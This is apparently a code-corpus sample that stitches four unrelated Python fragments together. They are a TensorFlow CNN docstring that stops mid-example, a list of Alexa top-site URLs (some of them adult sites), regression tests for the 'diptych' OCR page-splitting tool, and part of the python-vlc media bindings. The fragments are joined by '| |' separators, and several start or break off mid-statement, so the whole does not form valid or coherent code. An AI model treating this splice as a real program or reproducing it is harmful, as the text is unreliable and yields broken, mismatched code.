# NOTE: None & False same, default None so reader is not confused since dropout must be activated by specifying keep_prob
batch_norm=None, # One of [None, 'before', 'after'], specifies whether to use batch norm before or after the activation function in cnn layers
bn_option_dict=None, # Additional keyword arg dict of options for tf.layers.batch_normalization (see fused option!)
training=False, # boolean or tf.placeholder to control whether the graph is being used during training or inference
debug=False,
layer_var_scope_prefix='cnn_layer'):
"""
TODO(rpeloff) for batch_norm='after', see: https://github.com/ducha-aiki/caffenet-benchmark/blob/master/batchnorm.md
TODO(rpeloff) example usage for MNIST simulation:
>>> import mltoolset as ml
>>> import tensorflow as tf
>>> import numpy as np
>>> n_data = 5
>>> n_inputs = 28*28
>>> data = np.asarray(np.random.rand(n_data, n_inputs), dtype=NP_DTYPE)
>>> x_input = tf.placeholder(ml.TF_FLOAT, [None, n_inputs])
>>> input_shape = [28, 28, 1]
>>> n_layer_filters = [32, 32, 64, 64, 128]
>>> filter_sizes = [
# 1st cnn stack (can specify as tuple)
(3, 3), # filter shape of first layer: 32 filters with shape 3x3x1 = 288 weights
(3, 3), # filter shape of second layer: 32 filters with shape 3x3x32 = 9,216 weights
# 2nd cnn stack (can specify as integers)
3, # filter shape of third layer: 64 filters with shape 3x3x32 = 18,432 weights
3, # filter shape of fourth layer: 64 filters with shape 3x3x64 = 36,864 weights
# 3rd cnn stack (can specify as list)
[3, 3] # filter shape of fifth layer: 128 filters with shape 3x3x64 = 73,728 weights
| |
global
'http://www.govome.com/',
# Why: #1515 in Alexa global
'http://www.copyscape.com/',
# Why: #1516 in Alexa global
'http://www.minecraftforum.net/',
# Why: #1517 in Alexa global
'http://www.mit.edu/',
# Why: #1518 in Alexa global
'http://www.cvs.com/',
# Why: #1519 in Alexa global
'http://www.timesjobs.com/',
# Why: #1520 in Alexa global
'http://www.ksl.com/',
# Why: #1521 in Alexa global
'http://www.verizon.net/',
# Why: #1522 in Alexa global
'http://www.direct.gov.uk/',
# Why: #1523 in Alexa global
'http://www.miralinks.ru/',
# Why: #1524 in Alexa global
'http://www.elheddaf.com/',
# Why: #1525 in Alexa global
'http://www.stockphoto9.com/',
# Why: #1526 in Alexa global
'http://www.ashemaletube.com/',
# Why: #1527 in Alexa global
'http://www.dmm.com/',
# Why: #1528 in Alexa global
'http://www.abckj123.com/',
# Why: #1529 in Alexa global
'http://www.smzdm.com/',
# Why: #1530 in Alexa global
'http://www.china.cn/',
# Why: #1531 in Alexa global
'http://www.cox.com/',
# Why: #1532 in Alexa global
'http://www.welt.de/',
# Why: #1533 in Alexa global
'http://www.guyspy.com/',
# Why: #1534 in Alexa global
'http://www.makeuseof.com/',
# Why: #1535 in Alexa global
'http://www.tiscali.it/',
# Why: #1536 in Alexa global
'http://www.178.com/',
# Why: #1537 in Alexa global
'http://www.metrolyrics.com/',
# Why: #1538 in Alexa global
'http://www.vsuch.com/',
# Why: #1539 in Alexa global
'http://www.seosprint.net/',
# Why: #1540 in Alexa global
'http://www.samanyoluhaber.com/',
# Why: #1541 in Alexa global
'http://www.garanti.com.tr/',
# Why: #1542 in Alexa global
'http://www.chicagotribune.com/',
# Why: #1543 in Alexa global
'http://www.hinet.net/',
# Why: #1544 in Alexa global
'http://www.kp.ru/',
# Why: #1545 in Alexa global
'http://www.chomikuj.pl/',
# Why: #1546 in Alexa global
'http://www.nk.pl/',
# Why: #1547 in Alexa global
'http://www.webhostingtalk.com/',
# Why: #1548 in Alexa global
'http://www.dnaindia.com/',
# Why: #1550 in Alexa global
'http://www.programme-tv.net/',
# Why: #1551 in Alexa global
'http://www.ievbz.com/',
# Why: #1552 in Alexa global
'http://www.mysql.com/',
# Why: #1553 in Alexa global
'http://www.perfectmoney.is/',
# Why: #1554 in Alexa global
'http://www.liveundnackt.com/',
# Why: #1555 in Alexa global
'http://www.flippa.com/',
# Why: #1556 in Alexa global
'http://www.vevo.com/',
# Why: #1557 in Alexa global
'http://www.jappy.de/',
# Why: #1558 in Alexa global
'http://www.bidvertiser.com/',
# Why: #1559 in Alexa global
'http://www.bankmandiri.co.id/',
# Why: #1560 in Alexa global
'http://www.letour.fr/',
# Why: #1561 in Alexa global
'http://www.yr.no/',
# Why: #1562 in Alexa global
'http://www.suning.com/',
# Why: #1563 in Alexa global
'http://www.nosub.tv/',
# Why: #1564 in Alexa global
'http://www.delicious.com/',
# Why: #1565 in Alexa global
'http://www.pornpoly.com/',
# Why: #1566 in Alexa global
'http://www.echo.msk.ru/',
# Why: #1567 in Alexa global
'http://www.coingeneration.com/',
# Why: #1568 in Alexa global
'http://www.shutterfly.com/',
# Why: #1569 in Alexa global
'http://www.royalbank.com/',
# Why: #1570 in Alexa global
'http://www.techradar.com/',
# Why: #1571 in Alexa global
'http://www.114la.com/',
# Why: #1572 in Alexa global
'http://www.bizrate.com/',
# Why: #1573 in Alexa global
'http://www.srvey.net/',
# Why: #1574 in Alexa global
'http://www.heavy-r.com/',
# Why: #1575 in Alexa global
'http://www.telexfree.com/',
# Why: #1576 in Alexa global
'http://www.lego.com/',
# Why: #1577 in Alexa global
'http://www.battlefield.com/',
# Why: #1578 in Alexa global
'http://www.shahrekhabar.com/',
# Why: #1579 in Alexa global
'http://www.tuenti.com/',
# Why: #1580 in Alexa global
'http://www.bookmyshow.com/',
# Why: #1581 in Alexa global
'http://www.gamme.com.tw/',
# Why: #1582 in Alexa global
'http://www.ft.com/',
# Why: #1583 in Alexa global
'http://www.prweb.com/',
# Why: #1584 in Alexa global
'http://www.1337x.org/',
# Why: #1585 in Alexa global
'http://www.networkedblogs.com/',
# Why: #1586 in Alexa global
'http://www.pbskids.org/',
# Why: #1587 in Alexa global
'http://aipai.com/',
# Why: #1588 in Alexa global
'http://www.jang.com.pk/',
# Why: #1589 in Alexa global
'http://www.dribbble.com/',
# Why: #1590 in Alexa global
'http://www.ezdownloadpro.info/',
# Why: #1591 in Alexa global
'http://www.gonzoxxxmovies.com/',
# Why: #1592 in Alexa global
'http://www.aufeminin.com/',
# Why: #1594 in Alexa global
'http://www.6pm.com/',
# Why: #1596 in Alexa global
'http://www.azet.sk/',
# Why: #1597 in Alexa global
'http://www.trustedoffer.com/',
# Why: #1598 in Alexa global
'http://www.simplyhired.com/',
# Why: #1599 in Alexa global
'http://www.adserverpub.com/',
# Why: #1600 in Alexa global
'http://www.privalia.com/',
# Why: #1601 in Alexa global
'http://www.bedbathandbeyond.com/',
# Why: #1602 in Alexa global
'http://www.yyets.com/',
# Why: #1603 in Alexa global
'http://verycd.com/',
# Why: #1604 in Alexa global
'http://www.sbnation.com/',
# Why: #1605 in Alexa global
'http://www.blogspot.nl/',
# Why: #1606 in Alexa global
'http://www.ikariam.com/',
# Why: #1607 in Alexa global
'http://www.sitepoint.com/',
# Why: #1608 in Alexa global
'http://www.gazeta.ru/',
# Why: #1609 in Alexa global
'http://www.tataindicom.com/',
# Why: #1610 in Alexa global
'http://chekb.com/',
# Why: #1611 in Alexa global
'http://www.literotica.com/',
# Why: #1612 in Alexa global
'http://www.ah-me.com/',
# Why: #1613 in Alexa global
'http://eztv.it/',
# Why: #1614 in Alexa global
'http://www.onliner.by/',
# Why: #1615 in Alexa global
'http://pptv.com/',
# Why: #1616 in Alexa global
'http://www.macrumors.com/',
# Why: #1617 in Alexa global
'http://www.xvideo-jp.com/',
# Why: #1618 in Alexa global
'http://www.state.tx.us/',
# Why: #1619 in Alexa global
'http://www.jamnews.ir/',
# Why: #1620 in Alexa global
'http://etoro.com/',
# Why: #1621 in Alexa global
'http://www.ny.gov/',
# Why: #1622 in Alexa global
'http://www.searchenginewatch.com/',
# Why: #1623 in Alexa global
'http://www.google.co.cr/',
# Why: #1624 in Alexa global
'http://www.td.com/',
# Why: #1625 in Alexa global
'http://www.ahrefs.com/',
# Why: #1626 in Alexa global
'http://www.337.com/',
# Why: #1627 in Alexa global
'http://www.klout.com/',
# Why: #1628 in Alexa global
'http://www.ebay.es/',
# Why: #1629 in Alexa global
'http://www.theverge.com/',
# Why: #1631 in Alexa global
'http://www.kapook.com/',
# Why: #1632 in Alexa global
'http://www.barclays.co.uk/',
# Why: #1634 in Alexa global
'http://nuomi.com/',
# Why: #1635 in Alexa global
'http://www.index-of-mp3s.com/',
# Why: #1636 in Alexa global
'http://www.ohfreesex.com/',
# Why: #1637 in Alexa global
'http://www.mts.ru/',
# Why: #1638 in Alexa global
'http://www.itmedia.co.jp/',
# Why: #1639 in Alexa global
'http://www.instantcheckmate.com/',
# Why: #1640 in Alexa global
'http://www.sport.es/',
# Why: #1641 in Alexa global
'http://www.sitescout.com/',
# Why: #1642 in Alexa global
'http://www.irr.ru/',
# Why: #1643 in Alexa global
'http://tuniu.com/',
# Why: #1644 in Alexa global
'http://www.startimes.com/',
# Why: #1645 in Alexa global
'http://www.tvn24.pl/',
# Why: #1646 in Alexa global
'http://www.kenh14.vn/',
# Why: #1647 in Alexa global
'http://www.myvideo.de/',
# Why: #1648 in Alexa global
'http://www.speedbit.com/',
# Why: #1649 in Alexa global
'http://www.aljazeera.com/',
# Why: #1650 in Alexa global
'http://www.pudelek.pl/',
# Why: #1651 in Alexa global
'http://www.mmgp.ru/',
# Why: #1652 in Alexa global
'http://www.empflix.com/',
# Why: #1653 in Alexa global
'http://www.tigerdirect.com/',
# Why: #1655 in Alexa global
'http://www.elegantthemes.com/',
# Why: #1657 in Alexa global
'http://www.ted.com/',
# Why: #1658 in Alexa global
'http://www.carview.co.jp/',
# Why: #1659 in Alexa global
'http://www.down1oads.com/',
# Why: #1660 in Alexa global
'http://www.bancobrasil.com.br/',
# Why: #1661 in Alexa global
'http://www.qip.ru/',
# Why: #1662 in Alexa global
'http://www.nikkeibp.co.jp/',
# Why: #1663 in Alexa global
'http://www.fapdu.com/',
# Why: #1664 in Alexa global
'http://www.softango.com/',
# Why: #1665 in Alexa global
'http://www.ap.org/',
# Why: #1666 in Alexa global
'http://www.meteofrance.com/',
# Why: #1667 in Alexa global
'http://www.gentenocturna.com/',
# Why: #1668 in Alexa global
'http://www.2ch-c.net/',
# Why: #1669 in Alexa global
'http://www.orf.at/',
# Why: #1670 in Alexa global
'http://www.maybank2u.com.my/',
# Why: #1671 in Alexa global
'http://www.minecraftwiki.net/',
# Why: #1672 in Alexa global
'http://www.tv.com/',
# Why: #1673 in Alexa global
'http://www.orkut.com/',
# Why: #1674 in Alexa global
'http://www.adp.com/',
# Why: #1675 in Alexa global
'http://www.woorank.com/',
# Why: #1676 in Alexa global
'http://www.imagetwist.com/',
# Why: #1677 in Alexa global
'http://www.pastebin.com/',
# Why: #1678 in Alexa global
'http://www.airtel.com/',
# Why: #1679 in Alexa global
'http://www.ew.com/',
# Why: #1680 in Alexa global
'http://www.forever21.com/',
# Why: #1681 in Alexa global
'http://www.adam4adam.com/',
# Why: #1682 in Alexa global
'http://www.voyages-sncf.com/',
# Why: #1683 in Alexa global
'http://www.nextag.com/',
# Why: #1684 in Alexa global
'http://www.usnews.com/',
# Why: #1685 in Alexa global
'http://www.dinamalar.com/',
# Why: #1686 in Alexa global
'http://www.impress.co.jp/',
# Why: #1687 in Alexa global
'http://www.virginmedia.com/',
# Why: #1688 in Alexa global
'http://www.investopedia.com/',
# Why: #1689 in Alexa global
'http://www.seekingalpha.com/',
# Why: #1690 in Alexa global
'http://www.jumponhottie.com/',
# Why: #1691 in Alexa global
'http://www.national-lottery.co.uk/',
# Why: #1692 in Alexa global
'http://www.mobifiesta.com/',
# Why: #1693 in Alexa global
'http://www.kapanlagi.com/',
# Why: #1694 in Alexa global
'http://www.segundamano.es/',
# Why: #1695 in Alexa global
'http://gfan.com/',
# Why: #1696 in Alexa global
'http://www.xdating.com/',
# Why: #1697 in Alexa global
'http://www.ynet.com/',
# Why: #1698 in Alexa global
'http://www.medu.ir/',
# Why: #1699 in Alexa global
'http://www.hsn.com/',
# Why: #1700 in Alexa global
'http://www.newsru.com/',
# Why: #1701 in Alexa global
'http://www.minus.com/',
# Why: #1702 in Alexa global
'http://www.sitetalk.com/',
# Why: #1703 in Alexa global
'http://www.aarp.org/',
# Why: #1704 in | |
<reponame>bansan85/ocr-book-tests<gh_stars>0
import unittest
import numpy as np
from diptych.angle import Angle
from diptych.cv2ext import charge_image
from diptych.fsext import get_absolute_from_current_path
from diptych.print_interface import ConstString
from tests.mock_separate_page import MockDisableSeparatePage
# Promote every numpy floating-point warning to an exception so numerical
# regressions fail the suite loudly instead of propagating NaNs.
np.seterr(all="raise")
# Module-level TestCase instance; not referenced in this chunk — presumably
# used for its assert* helpers elsewhere in the file (TODO confirm).
tc = unittest.TestCase()
# First constructor argument of MockDisableSeparatePage in every test below;
# NOTE(review): appears to bound the number of pipeline steps — confirm.
MAX_VAL = 6
# Second constructor argument: toggles the fuzzing variant of the mock runs.
FUZZING = False
def test_0001_png() -> None:
    """Regression check on the first known-good double-page scan."""
    expected = {
        ConstString.separation_double_page_angle(): (
            "range",
            Angle.deg(90.42),
            Angle.deg(90.68),
        ),
        ConstString.separation_double_page_y(): ("range", 2480, 2489),
        ConstString.page_rotation(1): (
            "range",
            Angle.deg(0.49),
            Angle.deg(0.81),
        ),
        ConstString.page_rotation(2): (
            "range",
            Angle.deg(0.09),
            Angle.deg(0.21),
        ),
        ConstString.image_crop(1, "x1"): ("range", 325, 332),
        ConstString.image_crop(1, "y1"): ("range", 334, 337),
        ConstString.image_crop(1, "x2"): ("range", 2342, 2347),
        ConstString.image_crop(1, "y2"): ("range", 3221, 3223),
        ConstString.image_crop(2, "x1"): ("range", 165, 175),
        ConstString.image_crop(2, "y1"): ("range", 648, 649),
        ConstString.image_crop(2, "x2"): ("range", 2180, 2190),
        ConstString.image_crop(2, "y2"): ("range", 3360, 3362),
        ConstString.image_dpi(1): ("difference", 300, 0.0000001),
        ConstString.image_border(1, 1): ("range", 317, 340),
        ConstString.image_border(1, 2): ("range", 260, 282),
        ConstString.image_border(1, 3): ("range", 219, 225),
        ConstString.image_border(1, 4): ("range", 219, 225),
        ConstString.image_dpi(2): ("difference", 300, 0.0000001),
        ConstString.image_border(2, 1): ("range", 638, 674),
        ConstString.image_border(2, 2): ("range", 101, 136),
        ConstString.image_border(2, 3): ("range", 221, 224),
        ConstString.image_border(2, 4): ("range", 221, 224),
    }
    image = get_absolute_from_current_path(__file__, "0001.png")
    MockDisableSeparatePage(MAX_VAL, FUZZING).treat_file(image, expected)
def test_2_pages_2_contours_png() -> None:
    """Scan where each page yields its own contour instead of one shared one."""
    expected = {
        ConstString.separation_double_page_angle(): (
            "range",
            Angle.deg(89.91),
            Angle.deg(90.32),
        ),
        ConstString.separation_double_page_y(): ("range", 2486, 2492),
        ConstString.page_rotation(1): (
            "range",
            Angle.deg(-0.11),
            Angle.deg(0.21),
        ),
        ConstString.page_rotation(2): (
            "range",
            Angle.deg(0.04),
            Angle.deg(0.41),
        ),
        ConstString.image_crop(1, "x1"): ("range", 1181, 1199),
        ConstString.image_crop(1, "y1"): ("range", 1719, 1751),
        ConstString.image_crop(1, "x2"): ("range", 1182, 1200),
        ConstString.image_crop(1, "y2"): ("range", 1720, 1752),
        ConstString.image_crop(2, "x1"): ("range", 89, 114),
        ConstString.image_crop(2, "y1"): ("range", 240, 241),
        ConstString.image_crop(2, "x2"): ("range", 2136, 2159),
        ConstString.image_crop(2, "y2"): ("range", 3239, 3242),
        ConstString.image_dpi(1): ("difference", 300, 0.0000001),
        ConstString.image_border(1, 1): ("range", 1752, 1753),
        ConstString.image_border(1, 2): ("range", 1753, 1753),
        ConstString.image_border(1, 3): ("range", 1239, 1239),
        ConstString.image_border(1, 4): ("range", 1239, 1239),
        ConstString.image_dpi(2): ("difference", 300, 0.0000001),
        ConstString.image_border(2, 1): ("range", 226, 240),
        ConstString.image_border(2, 2): ("range", 248, 262),
        ConstString.image_border(2, 3): ("range", 203, 207),
        ConstString.image_border(2, 4): ("range", 203, 207),
    }
    image = get_absolute_from_current_path(__file__, "2-pages-2-contours.png")
    MockDisableSeparatePage(MAX_VAL, FUZZING).treat_file(image, expected)
def test_black_border_not_removed_png() -> None:
    """The border on the right is still there."""
    # Tolerance table: metric key -> ("range", lo, hi) or
    # ("difference", expected, epsilon).
    MockDisableSeparatePage(MAX_VAL, FUZZING).treat_file(
        get_absolute_from_current_path(
            __file__, "black-border-not-removed.png"
        ),
        {
            ConstString.separation_double_page_angle(): (
                "range",
                Angle.deg(89.95),
                Angle.deg(90.1),
            ),
            ConstString.separation_double_page_y(): ("range", 2451, 2458),
            ConstString.page_rotation(1): (
                "range",
                Angle.deg(-0.11),
                Angle.deg(0.21),
            ),
            ConstString.page_rotation(2): (
                "range",
                Angle.deg(-0.21),
                Angle.deg(0.16),
            ),
            ConstString.image_crop(1, "x1"): ("range", 294, 299),
            ConstString.image_crop(1, "y1"): ("range", 139, 144),
            ConstString.image_crop(1, "x2"): ("range", 2305, 2312),
            ConstString.image_crop(1, "y2"): ("range", 3345, 3349),
            ConstString.image_crop(2, "x1"): ("range", 153, 159),
            ConstString.image_crop(2, "y1"): ("range", 143, 146),
            ConstString.image_crop(2, "x2"): ("range", 2168, 2173),
            ConstString.image_crop(2, "y2"): ("range", 3350, 3353),
            ConstString.image_dpi(1): ("difference", 300, 0.0000001),
            ConstString.image_border(1, 1): ("range", 127, 137),
            ConstString.image_border(1, 2): ("range", 145, 157),
            ConstString.image_border(1, 3): ("range", 221, 226),
            ConstString.image_border(1, 4): ("range", 221, 226),
            ConstString.image_dpi(2): ("difference", 300, 0.0000001),
            ConstString.image_border(2, 1): ("range", 130, 139),
            ConstString.image_border(2, 2): ("range", 141, 151),
            ConstString.image_border(2, 3): ("range", 222, 224),
            ConstString.image_border(2, 4): ("range", 222, 224),
        },
    )
def test_image_failed_to_rotate_png() -> None:
    """Failed to compute angle to rotate. The image takes the whole page."""
    # Tolerance table: metric key -> ("range", lo, hi) or
    # ("difference", expected, epsilon).
    MockDisableSeparatePage(MAX_VAL, FUZZING).treat_file(
        get_absolute_from_current_path(__file__, "image_failed_to_rotate.png"),
        {
            ConstString.separation_double_page_angle(): (
                "range",
                Angle.deg(90.07),
                Angle.deg(90.50),
            ),
            ConstString.separation_double_page_y(): ("range", 2476, 2488),
            ConstString.page_rotation(1): (
                "range",
                Angle.deg(-0.01),
                Angle.deg(0.66),
            ),
            ConstString.page_rotation(2): (
                "range",
                Angle.deg(0.19),
                Angle.deg(0.51),
            ),
            ConstString.image_crop(1, "x1"): ("range", 19, 91),
            ConstString.image_crop(1, "y1"): ("range", 1, 23),
            ConstString.image_crop(1, "x2"): ("range", 2456, 2486),
            ConstString.image_crop(1, "y2"): ("range", 3483, 3505),
            ConstString.image_crop(2, "x1"): ("range", 159, 183),
            ConstString.image_crop(2, "y1"): ("range", 231, 236),
            ConstString.image_crop(2, "x2"): ("range", 2242, 2261),
            ConstString.image_crop(2, "y2"): ("range", 3354, 3359),
            ConstString.image_dpi(1): ("difference", 300, 0.0000001),
            ConstString.image_border(1, 1): ("range", 2, 19),
            ConstString.image_border(1, 2): ("range", 2, 19),
            ConstString.image_border(1, 3): ("range", 10, 55),
            ConstString.image_border(1, 4): ("range", 10, 55),
            ConstString.image_dpi(2): ("difference", 300, 0.0000001),
            ConstString.image_border(2, 1): ("range", 206, 228),
            ConstString.image_border(2, 2): ("range", 140, 160),
            ConstString.image_border(2, 3): ("range", 186, 192),
            ConstString.image_border(2, 4): ("range", 186, 192),
        },
    )
def test_image_failed_to_crop_data_png() -> None:
    """Failed to detect edges. The image takes the whole page and is too close
    to the border of the image.
    """
    # Tolerance table: metric key -> ("range", lo, hi) or
    # ("difference", expected, epsilon).
    MockDisableSeparatePage(MAX_VAL, FUZZING).treat_file(
        get_absolute_from_current_path(
            __file__, "image_failed_to_crop_data.png"
        ),
        {
            ConstString.separation_double_page_angle(): (
                "range",
                Angle.deg(89.86),
                Angle.deg(90.20),
            ),
            ConstString.separation_double_page_y(): ("range", 2477, 2486),
            ConstString.page_rotation(1): (
                "range",
                Angle.deg(-0.16),
                Angle.deg(0.21),
            ),
            ConstString.page_rotation(2): (
                "range",
                Angle.deg(-0.01),
                Angle.deg(0.21),
            ),
            ConstString.image_crop(1, "x1"): ("range", 40, 116),
            ConstString.image_crop(1, "y1"): ("range", 1, 13),
            ConstString.image_crop(1, "x2"): ("range", 2469, 2483),
            ConstString.image_crop(1, "y2"): ("range", 3499, 3505),
            ConstString.image_crop(2, "x1"): ("range", 155, 168),
            ConstString.image_crop(2, "y1"): ("range", 217, 220),
            ConstString.image_crop(2, "x2"): ("range", 2235, 2248),
            ConstString.image_crop(2, "y2"): ("range", 3348, 3350),
            ConstString.image_dpi(1): ("difference", 300, 0.0000001),
            ConstString.image_border(1, 1): ("range", 2, 11),
            ConstString.image_border(1, 2): ("range", 2, 11),
            ConstString.image_border(1, 3): ("range", 19, 58),
            ConstString.image_border(1, 4): ("range", 19, 58),
            ConstString.image_dpi(2): ("difference", 300, 0.0000001),
            ConstString.image_border(2, 1): ("range", 205, 225),
            ConstString.image_border(2, 2): ("range", 129, 151),
            ConstString.image_border(2, 3): ("range", 189, 192),
            ConstString.image_border(2, 4): ("range", 189, 192),
        },
    )
def test_wrong_angle_split_line_png() -> None:
    """Check that the split-line angle is detected correctly.

    NOTE(review): the original docstring was copy-pasted from
    test_image_failed_to_crop_data_png; the function name suggests this
    case exercises a wrongly-detected split-line angle — confirm intent.
    """
    # Tolerance table: metric key -> ("range", lo, hi) or
    # ("difference", expected, epsilon).
    MockDisableSeparatePage(MAX_VAL, FUZZING).treat_file(
        get_absolute_from_current_path(__file__, "wrong_angle_split_line.png"),
        {
            ConstString.separation_double_page_angle(): (
                "range",
                Angle.deg(90.00),
                Angle.deg(90.22),
            ),
            ConstString.separation_double_page_y(): ("range", 2476, 2487),
            ConstString.page_rotation(1): (
                "range",
                Angle.deg(-0.16),
                Angle.deg(0.21),
            ),
            ConstString.page_rotation(2): (
                "range",
                Angle.deg(-0.01),
                Angle.deg(0.21),
            ),
            ConstString.image_crop(1, "x1"): ("range", 28, 61),
            ConstString.image_crop(1, "y1"): ("range", 1, 10),
            ConstString.image_crop(1, "x2"): ("range", 2470, 2485),
            ConstString.image_crop(1, "y2"): ("range", 3500, 3505),
            ConstString.image_crop(2, "x1"): ("range", 154, 171),
            ConstString.image_crop(2, "y1"): ("range", 217, 219),
            ConstString.image_crop(2, "x2"): ("range", 2237, 2249),
            ConstString.image_crop(2, "y2"): ("range", 3348, 3350),
            ConstString.image_dpi(1): ("difference", 300, 0.0000001),
            ConstString.image_border(1, 1): ("range", 2, 8),
            ConstString.image_border(1, 2): ("range", 2, 8),
            ConstString.image_border(1, 3): ("range", 15, 34),
            ConstString.image_border(1, 4): ("range", 15, 34),
            ConstString.image_dpi(2): ("difference", 300, 0.0000001),
            ConstString.image_border(2, 1): ("range", 195, 219),
            ConstString.image_border(2, 2): ("range", 136, 159),
            ConstString.image_border(2, 3): ("range", 188, 192),
            ConstString.image_border(2, 4): ("range", 188, 192),
        },
    )
    # The saved first page must still be a 3-channel image.
    tc.assertEqual(
        charge_image(
            get_absolute_from_current_path(
                __file__, "wrong_angle_split_line.png_page_1.png"
            )
        ).shape[2],
        3,
    )
def test_angle_page_lower_split_line_png() -> None:
    """Failed when the angle of a page is lower than
    the angle of the split line.
    """
    # Tolerance table: metric key -> ("range", lo, hi) or
    # ("difference", expected, epsilon).
    MockDisableSeparatePage(MAX_VAL, FUZZING).treat_file(
        get_absolute_from_current_path(
            __file__, "angle_page_lower_split_line.png"
        ),
        {
            ConstString.separation_double_page_angle(): (
                "range",
                Angle.deg(89.71),
                Angle.deg(89.81),
            ),
            ConstString.separation_double_page_y(): ("range", 2470, 2475),
            ConstString.page_rotation(1): (
                "range",
                Angle.deg(-0.46),
                Angle.deg(-0.14),
            ),
            ConstString.page_rotation(2): (
                "range",
                Angle.deg(0.04),
                Angle.deg(0.21),
            ),
            ConstString.image_crop(1, "x1"): ("range", 241, 245),
            ConstString.image_crop(1, "y1"): ("range", 156, 161),
            ConstString.image_crop(1, "x2"): ("range", 2350, 2357),
            ConstString.image_crop(1, "y2"): ("range", 3364, 3368),
            ConstString.image_crop(2, "x1"): ("range", 136, 154),
            ConstString.image_crop(2, "y1"): ("range", 145, 147),
            ConstString.image_crop(2, "x2"): ("range", 2243, 2264),
            ConstString.image_crop(2, "y2"): ("range", 3350, 3352),
            ConstString.image_dpi(1): ("difference", 300, 0.0000001),
            ConstString.image_border(1, 1): ("range", 130, 147),
            ConstString.image_border(1, 2): ("range", 135, 152),
            ConstString.image_border(1, 3): ("range", 172, 177),
            ConstString.image_border(1, 4): ("range", 172, 177),
            ConstString.image_dpi(2): ("difference", 300, 0.0000001),
            ConstString.image_border(2, 1): ("range", 116, 132),
            ConstString.image_border(2, 2): ("range", 151, 168),
            ConstString.image_border(2, 3): ("range", 174, 176),
            ConstString.image_border(2, 4): ("range", 174, 176),
        },
    )
def test_wrong_split_line_png() -> None:
    """Improve the choice of the split line between different algorithms."""
    # Tolerance table: metric key -> ("range", lo, hi) or
    # ("difference", expected, epsilon).
    MockDisableSeparatePage(MAX_VAL, FUZZING).treat_file(
        get_absolute_from_current_path(__file__, "wrong_split_line.png"),
        {
            ConstString.separation_double_page_angle(): (
                "range",
                Angle.deg(89.80),
                Angle.deg(89.99),
            ),
            ConstString.separation_double_page_y(): ("range", 2461, 2471),
            ConstString.page_rotation(1): (
                "range",
                Angle.deg(-0.16),
                Angle.deg(0.01),
            ),
            ConstString.page_rotation(2): (
                "range",
                Angle.deg(0.19),
                Angle.deg(0.71),
            ),
            ConstString.image_crop(1, "x1"): ("range", 211, 213),
            ConstString.image_crop(1, "y1"): ("range", 155, 157),
            ConstString.image_crop(1, "x2"): ("range", 2322, 2324),
            ConstString.image_crop(1, "y2"): ("range", 3362, 3363),
            ConstString.image_crop(2, "x1"): ("range", 115, 129),
            ConstString.image_crop(2, "y1"): ("range", 160, 167),
            ConstString.image_crop(2, "x2"): ("range", 2230, 2243),
            ConstString.image_crop(2, "y2"): ("range", 3371, 3378),
            ConstString.image_dpi(1): ("difference", 300, 0.0000001),
            ConstString.image_border(1, 1): ("range", 115, 180),
            ConstString.image_border(1, 2): ("range", 100, 167),
            ConstString.image_border(1, 3): ("range", 173, 175),
            ConstString.image_border(1, 4): ("range", 173, 175),
            ConstString.image_dpi(2): ("difference", 300, 0.0000001),
            ConstString.image_border(2, 1): ("range", 129, 148),
            ConstString.image_border(2, 2): ("range", 129, 152),
            ConstString.image_border(2, 3): ("range", 168, 174),
            ConstString.image_border(2, 4): ("range", 168, 174),
        },
    )
def test_crop_too_much_png() -> None:
    """Reduce the distance used to ignore black areas close to the edge."""
    # Tolerance table: metric key -> ("range", lo, hi) or
    # ("difference", expected, epsilon).
    MockDisableSeparatePage(MAX_VAL, FUZZING).treat_file(
        get_absolute_from_current_path(__file__, "crop_too_much.png"),
        {
            ConstString.separation_double_page_angle(): (
                "range",
                Angle.deg(90.03),
                Angle.deg(90.47),
            ),
            ConstString.separation_double_page_y(): ("range", 2452, 2463),
            ConstString.page_rotation(1): (
                "range",
                Angle.deg(-0.16),
                Angle.deg(0.16),
            ),
            ConstString.page_rotation(2): (
                "range",
                Angle.deg(0.19),
                Angle.deg(0.51),
            ),
            ConstString.image_crop(1, "x1"): ("range", 300, 303),
            ConstString.image_crop(1, "y1"): ("range", 145, 148),
            ConstString.image_crop(1, "x2"): ("range", 2313, 2317),
            ConstString.image_crop(1, "y2"): ("range", 3350, 3353),
            ConstString.image_crop(2, "x1"): ("range", 158, 180),
            ConstString.image_crop(2, "y1"): ("range", 151, 156),
            ConstString.image_crop(2, "x2"): ("range", 2176, 2192),
            ConstString.image_crop(2, "y2"): ("range", 3359, 3363),
            ConstString.image_dpi(1): ("difference", 300, 0.0000001),
            ConstString.image_border(1, 1): ("range", 116, 135),
            ConstString.image_border(1, 2): ("range", 147, 168),
            ConstString.image_border(1, 3): ("range", 221, 225),
            ConstString.image_border(1, 4): ("range", 221, 225),
            ConstString.image_dpi(2): ("difference", 300, 0.0000001),
            ConstString.image_border(2, 1): ("range", 95, 142),
            ConstString.image_border(2, 2): ("range", 140, 186),
            ConstString.image_border(2, 3): ("range", 218, 224),
            ConstString.image_border(2, 4): ("range", 218, 224),
        },
    )
def test_crop_too_few_png() -> None:
"""Improve detection of black area to ignored
and that are closed to the edge.
"""
MockDisableSeparatePage(MAX_VAL, FUZZING).treat_file(
get_absolute_from_current_path(__file__, "crop_too_few.png"),
{
ConstString.separation_double_page_angle(): (
"range",
Angle.deg(89.22),
Angle.deg(89.62),
),
ConstString.separation_double_page_y(): ("range", 2508, 2515),
ConstString.page_rotation(1): (
"range",
Angle.deg(-0.81),
Angle.deg(-0.49),
),
ConstString.page_rotation(2): (
"range",
Angle.deg(-0.16),
| |
return libvlc_media_get_meta(self, e_meta, e)
if hasattr(dll, 'libvlc_media_get_state'):
def get_state(self):
"""Get current state of media descriptor object. Possible media states
are defined in libvlc_structures.c ( libvlc_NothingSpecial=0,
libvlc_Opening, libvlc_Buffering, libvlc_Playing, libvlc_Paused,
libvlc_Stopped, libvlc_Ended,
libvlc_Error).
See libvlc_state_t
@return: state of media descriptor object
"""
e=VLCException()
return libvlc_media_get_state(self, e)
if hasattr(dll, 'libvlc_media_subitems'):
def subitems(self):
"""Get subitems of media descriptor object. This will increment
the reference count of supplied media descriptor object. Use
libvlc_media_list_release() to decrement the reference counting.
@return: list of media descriptor subitems or NULL
"""
e=VLCException()
return libvlc_media_subitems(self, e)
if hasattr(dll, 'libvlc_media_event_manager'):
def event_manager(self):
"""Get event manager from media descriptor object.
NOTE: this function doesn't increment reference counting.
@return: event manager object
"""
e=VLCException()
return libvlc_media_event_manager(self, e)
if hasattr(dll, 'libvlc_media_get_duration'):
def get_duration(self):
"""Get duration of media descriptor object item.
